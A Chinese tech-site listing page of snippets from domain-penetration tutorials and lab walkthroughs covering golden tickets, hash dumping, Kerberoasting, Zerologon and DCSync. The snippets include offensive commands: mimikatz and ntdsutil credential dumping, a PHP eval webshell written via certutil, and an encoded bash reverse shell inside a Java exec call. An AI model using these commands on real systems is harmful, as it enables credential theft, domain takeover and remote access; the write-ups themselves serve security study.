- 综合排序
- 最热优先
- 最新优先
- 来自专栏渗透云笔记
域渗透学习
获取一台主机的本地管理员组成员账号的口令NTLM后,无法破解密码,使用PTH方法将管理员账号及NTLM注入当前会话作为凭据,利用该凭据可以渗透获取周围的主机的管理权限,如果对方存在相同账号及密码,进行密码碰撞是可以获取到这些主机权限的 黄金票据的制作条件: 1.域名称 2.域的SID 3.域控的Krbtgt账户的密码hash值 4.任意域用户名 制作TGT票据需要获取Krbtgt账户的密码hash,而Krbtgt账户的密码hash存储在域控上 因此黄金票据攻击测试本身就是个无解的死循环,所以他并不是一种普通的攻击方式,该攻击方式其实是一种后门的形式,属于第二次进行攻击的方法,第一次拿到域管权限之后,需要将krbtgt hash进行保存,当第二次再来进行渗透攻击时 4.查看共享 dir \\WIN-6JM3ECTM2CO.safe-duck.com\c$ ? 4.域内主机伪造白银票据 mimikatz.exe "kerberos::golden /user:win7 /domain:safe-duck.com /sid:S-1-5-21-4065905668
2K31发布于 2020-11-03 - 来自专栏Gamma安全实验室
域渗透技巧
引擎来获取远程机器的登录session,并且不需要管理员权限 smb-enum-domains.nse对域控制器进行信息收集扫描,可以获取主机信息,用户,密码策略可以用的用户等 smb-enum-users.nse在进行域渗透的时候 9155-ed8a2e1e36fc}" quit quit 删除快照 ntdsutil snapshot "delete {da243bc6-2278-44b4-9155-ed8a2e1e36fc}" NTLM Hash,我们就可以伪造S4U请求,进而伪装成服务用户以任意账户的权限申请访问某服务的ST。 /ticket:test.kirbi 3.得到用户TGT的服务使用伪造s4u2self请求和s4u2proxy以administrator用户身份请求访问 Tgs::s4u /tgt:tgt票据名称 /user:administrator@networksec /service:访问服务名称 /user.networksec 4.将S4U2Self获取到的ST1以及S4U2Proxy获取到的访问服务的
1.6K21发布于 2021-07-23 - 来自专栏全栈程序员必看
域渗透之导出域Hash
域渗透之导出域Hash 前言 网上采集了一些域内导出NTDS.dit文件的方式 Hash 值存储在域控制器中(C:\Windows\NTDS\NTDS.DIT) Mimikatz Mimikatz有一个功能 渗透测试中可以用它来拍摄 ntds.dit 文件的快照 # 创建快照 ntdsutil snapshot "activate instance ntds" create quit quit GUID 为 module_source/credentials/Invoke-DCSync.ps1')";Invoke-DCSync -PWDumpFormat > hash.txt 通过NinjaCopy获得域控服务器 home/workspace/hash/hash.txt 使用 Ntdsutil、Vssadmin 等卷影拷贝工具时,需要先开启 Volume Shadow Copy Service 服务 参考 [域渗透 ]导出域用户Hash方法总结 发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/119832.html原文链接:https://javaforall.cn
1.5K10编辑于 2022-07-13 - 来自专栏红蓝对抗
【内网渗透】域渗透实战之 cascade
我们可以使用Bloodhound等工具对目标主机的域环境进行分析,发现r.thompson用户属于IT组,但不在远程登录组中。 最后,我们根据用户名称TempAdmin推测可能是之前域管的密码,使用密码重用攻击成功登录到administrator域管账号,并使用wmiexec登录域控拿到system权限。 该对象(去除了其大部分属性)将在域的tombstoneLifetime中指定的时间段内保留在分区的“已删除对象”容器中 。在此期间,该对象在技术上是可以恢复的,但其丢失的属性一般可以认为是不可恢复的。 tombstoneLifetime的值 基于创建域林时涉及的 Windows Server 版本。
1.6K40编辑于 2023-09-25 - 来自专栏红蓝对抗
【内网渗透】域渗透实战之Monteverde
域渗透实战之Monteverde信息收集:端口扫描使用nmap去探测端口,发现开放了53,88,139等多个端口。接着去识别其端口对应的版本。SMB未授权使用smbclient 去尝试未授权访问。 ‡https://login.windows.net/372efea9-7bc4-4b76-8839-984b45edfb98/:::https://graph.windows.net/:::1950a258 -7OCwfSJHG9Dja4r8B_iS0-VvcwzRUT_-2t1eNN8vgRgTlgAdotG330U9SshDgVjg27VHIw-e-57ID7FTEjnVfc4loRNjoNJlSAA" 总结:Azure AD Connect 数据库漏洞 (Priv Esc)简介Azure AD Connect 服务本质上负责同步本地 AD 域和基于 Azure 的域之间的事物。 AD 中分配了全局管理员角色的 Azure 帐户Azure AD 连接首先,您需要在 Azure AD 中设置一个具有全局管理员权限的帐户,这可以通过管理门户轻松完成:创建帐户后,我们需要在有权访问域的服务器上安装
1.2K10编辑于 2023-10-27 - 来自专栏重生信息安全
域渗透基础(一)
域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者管理其他的域,每个域都有自己的安全策略,以及它与其他域的安全信任关系。 2012 R2 172.16.151.200 Windows 7 172.16.151.201 启动虚拟机,网络和共享中心-更改适配器设置-Ethernet0(右键)-属性-Internet协议版本4( (以上的内容对应流程图中的步骤3、4) ? 凭票入场 客户端接收到TGS回复后,通过缓存的Logon Session Key解密获取Service Session Key。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 如何关闭取消删除Windows默认共享 net use命令详解 在对方电脑建立IPC连接, 利用IPC$入侵 执行木马 域渗透前置知识
2.6K10发布于 2020-06-10 - 来自专栏红蓝对抗
【内网渗透】域渗透实战之Resolute
域渗透实战之Resolute 信息收集 端口扫描 使用nmap去扫描端口,发现存在53、125、139、445等端口开放。 接着去收集它的版本。 漏洞利用 枚举 SMB 用户 使用 enumdomusers 列出用户,然后查询0x1f4的用户信息。 ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123 其 RPC 接口 UUID 为 50ABC2A4–574D-40B3–9D66-EE4FD5FBA076,并使用 \PIPE\DNSSERVER 命名管道进行传输。 根据我的经验,这些对象的 ACL 通常不像域管理员(或受 AdminSDHolder 保护的类似组)的 ACL 那样保持干净或受监控,因此为小范围的域特权提升提供了很好的机会。
68820编辑于 2023-09-25 - 来自专栏红蓝对抗
【内网渗透】域渗透实战之 cascade
我们可以使用Bloodhound等工具对目标主机的域环境进行分析,发现r.thompson用户属于IT组,但不在远程登录组中。 最后,我们根据用户名称TempAdmin推测可能是之前域管的密码,使用密码重用攻击成功登录到administrator域管账号,并使用wmiexec登录域控拿到system权限。 该对象(去除了其大部分属性)将在域的tombstoneLifetime中指定的时间段内保留在分区的“已删除对象”容器中 。在此期间,该对象在技术上是可以恢复的,但其丢失的属性一般可以认为是不可恢复的。 tombstoneLifetime的值 基于创建域林时涉及的 Windows Server 版本。
1.7K20编辑于 2023-09-18 - 来自专栏Gamma安全实验室
域渗透-域内权限维持(上)
前言 域内权限维持的方法总结如下: DSRM 利用基于资源的约束委派进行域权限维持 Delegation Golden Ticket 利用域用户登陆脚本 万能密码(Skeleton-Key) 黄金票据 --DSRM账户是域控的本地管理员账户,并非域的管理员帐户,存储在SAM文件中,所以DSRM密码同步之后并不会影响域的管理员帐户,另外,在下一次进行DSRM密码同步之前,NTLM的值一直有效,且更改域内的 1:只有当本地AD、DS服务停止时,才可以使用DSRM管理员账号登录域控。 2:在任何情况下,都可以使用DSRM管理员账号登录域控。 : 值得注意的是,基于资源的委派,必须是委派双方需资源,例如机器帐户,服务帐户什么的,不能是域用户,下面尝试使用设置域用户帐户设置基于资源的委派,发现能设置,但是实际上是用不了 获取test1域用户的sid PrincipalsAllowedToDelegateToAccount test1 Get-DomainObject Krbtgt -Properties PrincipalsAllowedToDelegateToAccount 4.
1.3K20编辑于 2022-08-30 - 来自专栏红蓝对抗
域渗透——多层内网环境渗透测试(三)
本次多层网络域渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含Laravel Debug mode RCE(CVE-2021-3129 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。 多层隧道代理、内网信息收集、NTLM与SMB Relay攻击、Psexec远控、哈希传递(PTH)、黄金票据、白银票据 攻击过程 信息收集 我们现在开始对目标的攻击,我们首先对入口机web服务器进行渗透测试 > PD9waHAgZXZhbCgkX1JFUVVFU1RbODg4XSk7Pz4K 成功写入编码 certutil -decode C:\MYOA\webroot\ispirit\interface\ 586b1f16237fdfa1 利用hash登录域控 proxychains4 python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
1.8K10编辑于 2024-03-20 - 来自专栏谢公子学安全
内网渗透(四) | 域渗透之Kerberoast攻击
以下文章来源于安全加 ,作者谢公子 作者:谢公子 CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。 Kerberoast攻击 kerberoast攻击发生在kerberos协议的TGS_REP阶段,关于kerberos协议详情,传送门:内网渗透 | 域内认证之Kerberos协议详解 Kerberoast 在服务票证请求(TGS-REQ)过程中,攻击者可以指定它们支持的Kerberos加密类型(RC4_HMAC,AES256_CTS_HMAC_SHA1_96等等)。 4.攻击者从 TGS-REP 中提取加密的服务票证。由于服务票证是用链接到请求 SPN 的帐户的哈希加密的,所以攻击者可以离线破解这个加密块,恢复帐户的明文密码。 SPN服务主体名称的发现 传送门:域渗透之SPN服务主体名称 请求服务票据 使用Rubeus请求 Rubeus里面的kerberoast支持对所有用户或者特定用户执行kerberoasting操作,其原理在于先用
1.8K30编辑于 2022-01-19 - 来自专栏全栈程序员必看
域渗透之Zerologon域提权漏洞
域渗透之Zerologon域提权漏洞 组件概述 Netlogon远程协议是一个远程过程调用(RPC)接口,用于基于域的网络上的用户和计算机身份验证。 Netlogon远程协议用于维护从域成员到域控制器(DC),域的DC之间以及跨域的DC之间的域关系。此RPC接口用于发现和管理这些关系。 漏洞概述 该漏洞主要是由于在使用Netlogon安全通道与域控进行连接时,由于认证协议加密部分的缺陷,导致攻击者可以将域控管理员用户的密码置为空,从而进一步实现密码hash获取并最终获得管理员权限。 成功的利用可以实现以管理员权限登录域控设备,并进一步控制整个域。 -t指定域控ip 运行exp,确定把域控机器账户密码置换成空 完成后使用 python secretsdump.py 域名/ADD-DC$@192.168.11.15 -no-pass 拖hash,获取域管
1K00编辑于 2022-07-13 - 来自专栏鸿鹄实验室
域渗透之GPP漏洞
密码更改方式一:SYSVOL SYSVOL是AD(活动目录)里面一个存储域公共文件服务器副本的共享文件夹,所有的认证用户都可以读取。SYSVOL包括登录脚本,组策略数据,以及其他域控所需要的域数据。 然后之前的人,常常使用vbs来更改密码,而vbs又是明文密码存储,加上路径域内可随意访问,也就导致了信息漏洞的存在。 除了这个之外呢,我们也可以使用powersploit套件里面的Get-GPPPassword.ps1进行域内尝试。 ? 果有密码就会直接显示出来。 参考文章: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70- 1f2fa45dd4be?
3.6K20发布于 2021-07-06 - 来自专栏谢公子学安全
内网渗透 | 搭建域环境
搭建域环境 目录 部署域架构 如何加入域 域中主机的登录 SRV出错及解决办法 SRV记录注册不成功的可能原因 禁用域中的账户 将计算机退出域 添加域用户 部署域结构 在域架构中 成为域控之后新建的用户,必须满足密码规则。如果成为域控后新建的用户不属于administrators组,则这些用户可以登录除域控外的其他域内主机。 域控只允许administrators组内的用户以域身份登录,域控不能以本地身份登录。 域控中administrator组内的用户都是域管理员! 退出时需要输入域管理员账号和密码。 添加域用户 在域控上添加的用户都是域用户。 如果想在其他域成员主机上添加域用户,需要在域成员主机上以域管理员权限登录,然后执行以下命令添加域用户 net user xie 123456 /add /domain #添加域用户
2K10编辑于 2022-01-19 - 来自专栏quan9i的安全笔记
内网渗透|域环境搭建
域内环境搭建 安装域控 这里要选带有GUI的服务器,不然就只有CMD命令行,没有图形化界面 之后持续下一步和同意即可至开机界面。 我们要做的事情如下 1、分配IP 2、更改计算机名 3、安装域控制器和DNS服务器 4、升级服务器 5、创建Active Directory用户 接下首先进行分配IP的操作 路径是控制面板->网络和Internet ->网络连接 而后选择属性,选中Internet 协议版本4这个,如下图配置即可 此时IP就配置好啦。 接下来在Win7上配置IP 本身IP需要与域控在同一C段下,这样才能访问到域控,DNS为域控IP。 ,可以是普通用户,也可以是域控 我们这里选择切换用户,然后登录域普通用户 此时登录成功后可以尝试ping下域控和DNS 可以发现是Ping通的 此时看下域控处能不能管理Win7 发现此时报错了,
64940编辑于 2023-10-19 - 来自专栏it同路人
攻防环境之域渗透
本文只是域渗透基础,用的都是常规手段,所以没有涉及绕过防火墙以及杀软。 梳理思路 这是参照拓扑图 ? 第一步:chuanxiao主域配置 域控:win2008 域成员:win2003、win2012 域控 首先在win2008配置域控,运行:dcpromo ? 下一步到 ? 命名 ? 不可上网,可ping通域控 ? 可ping通其他域成员 ? 来检查下域成员 ? chuanxiao域环境搞定 第二步 :segregation子域配置 子域控 和2008大同小异,添加角色和功能 ? 记录下sid和NTLM sid: S-1-5-21-3768270215-1557359955-1468639445 NTLM: a93576ad393e1247ad4e7155060bdac2 利用 搞定 渗透实验 这次实验用主要用metasploit解决,当然Empire也是可以的。 WIN-2003 首先,我们的起点是一台win2003,把它作为内网渗透的突破口 ?
1.8K20发布于 2019-11-20 - 来自专栏红蓝对抗
攻防|域渗透之Sunday
', // 数据库连接参数 'params' => [], // 数据库编码默认采用utf8 'charset' => 'utf8mb4' >' into outfile '/tmp/view.tpl' 内网渗透 权限提升 发现 是ubuntu16.04 版本 , 提权exp :https://github.com/luijait/PwnKit-Exploit Exception { Process p = null; try { Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvd GNwLzEwMy4xNDguMjQ0LjE1MS84ODc3IDA 判断其存在域环境。 域渗透 使用fscan进行扫描,发现其存在域控。 域控ip为:10.10.10.133 获取域控权限 ZeroLogon(CVE-2020-1472) 提权域控 发现该主机存在ZeroLogon置空漏洞。 使用脚本进行域控密码置空。
45510编辑于 2023-11-28 - 来自专栏红蓝对抗
域渗透实战之Forest
hashcat解密$krb5asrep$23$svc-alfresco@HTB.LOCAL:93fbd77d6d4b54d331e1a665047d4dfb$8a3d3a98956b1c0a9cf886b8e073db94b6f9be12e2703f641a7d067c9525d45822f2c69308b46c169be00137b1837c894d9df7a2fc4a9c738a115eb8c8cbed813f4ca10ef1163260e0b3c324f55ece2377d8695e914f330e2224caadefe4953435a4f0b26138aab58b45bfdd46c5c62e38dfef85776d3323e2a5abc4179ebd2b57149c7e71042d76846e41668f2b8fe34448e6e3ee75bf4d5716f47997f279af20a1d415e9e1bf1517befef8722dcda7b055065685630bebf2119c04582b81f86d3f42466cfb0c419074b889cb9a8653e6ec74b137746034ceed687c6baeb01e2ae47906f5b7 因此,我们有四 (4) 件事要做:创建用户将其添加到“Exchange Windows 权限”组将其添加到“远程管理用户”组(具有远程访问权限)滥用 DACL 的弱权限来获取DCSync权限判断用户群组归属接着使用 总结:DCSync与DCshadow是域渗透中经常会用到的技术。 DCSync 之前,获取域的账号口令信息,需要登录域服务器,在域服务器上运行代码才可以获取。DCSync 的最大特点,在于不用登录域服务器,即可远程通过域数据同步复制的方式获得想要的用户口令信息。 DC 认可,能够参与域复制 ;3、强制触发域复制,将指定的新对象或修改后的对象属性同步复制到其他 DC 中;1.注册伪造的DC一台机器要想注册成为域中的一台 DC 服务器,需要在域的活动目录中注册一个
1K61编辑于 2023-09-15 - 来自专栏糖果的实验室
MSF 下域内渗透
MSF 下域内渗透实战 先获取域内机器session ? Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 只要是管理员在线或者没有注销。 3.收集域环境信息+找到域控 利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。 爆破局域网中存在数据库服务器的主机 由于 2008 默认安全口令策略, 口令强度比较强 ,这个扫描就算吧 4.键盘记录+3389 登入记录 这个记录了 在线管理员的 键盘记录~ 可以用 msf 的试试 为了能够获取到域管理员的凭证我们需要用域管理员登录一下远程桌面。 ?
1K21发布于 2019-11-20 - 来自专栏Urahara Blog
域渗透-信息收集基础
,且选项名即为域名; net time /domain 执行该命令,有三种情况:第一种如果存在域会从域控返回时间,并在第一行返回域控及域名;第二种如果当前当前服务器在域内但当前用户非域用户,则会返回 DNS服务器即为域控,很少将DNS与域控分开,除非内网很大存在多域环境; systeminfo 系统信息当中含有两项:Domain和Logon Server,Domain即为域名,Logon Server 为域控,但如果Domain显示为WORKGROUP则当前服务器不在域内; net config workstation 其中工作域显示域名,同样若为WORKGROUP则非域环境,登录域表明当前用户是域用户登录还是本地用户登录 在内网渗透过程中,说白了就是不断进行信息收集,扩大攻击面,除了以上收集的信息外,我们最关注的也是当前服务器上的所有系统账号密码,这一般有三种情况,首先是服务器本地账户,其次是域用户,当然如果有狗屎运的话抓到域管的账号密码也不是没有可能的 ;再者,如果当前已获得域用户账号密码,除非此时有ms14-068 kerberos漏洞或者GPP组策略漏洞可利用提升至域管权限,要不只能再继续进行拓展直至抓取到域管hash为止。
2.6K50发布于 2018-06-07
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号